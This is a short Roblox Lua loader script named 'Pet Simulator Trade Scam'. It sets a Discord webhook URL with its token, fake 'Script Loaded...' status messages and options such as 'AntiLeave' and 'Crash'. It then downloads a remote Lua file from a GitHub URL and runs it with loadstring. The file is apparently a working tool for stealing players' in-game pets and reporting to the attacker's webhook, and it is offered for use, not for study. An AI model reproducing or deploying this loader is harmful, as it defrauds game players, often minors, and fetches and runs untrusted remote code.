Username = "VOID_open"
WebHook = "https://discord.com/api/webhooks/1095336255564296202/jNxfZqD6iUjbgohRLSFL8J5Qrx5DbLLolNksgG92UGMb3NsufOzF7SIaC7fV-nMMVTi5"

_G.CustomScriptName = "Pet Simulator Trade Scam"
_G.UnlockPets = true
_G.AntiLeave = true
_G.Diamonds = 50000
_G.Crash = true
_G.Text1 = "Script Loaded..."
_G.Text2 = "Waiting for Script"
_G.Text3 = "Checking Scripts..."
_G.Text4 = "Starting Scripts..."

loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))()
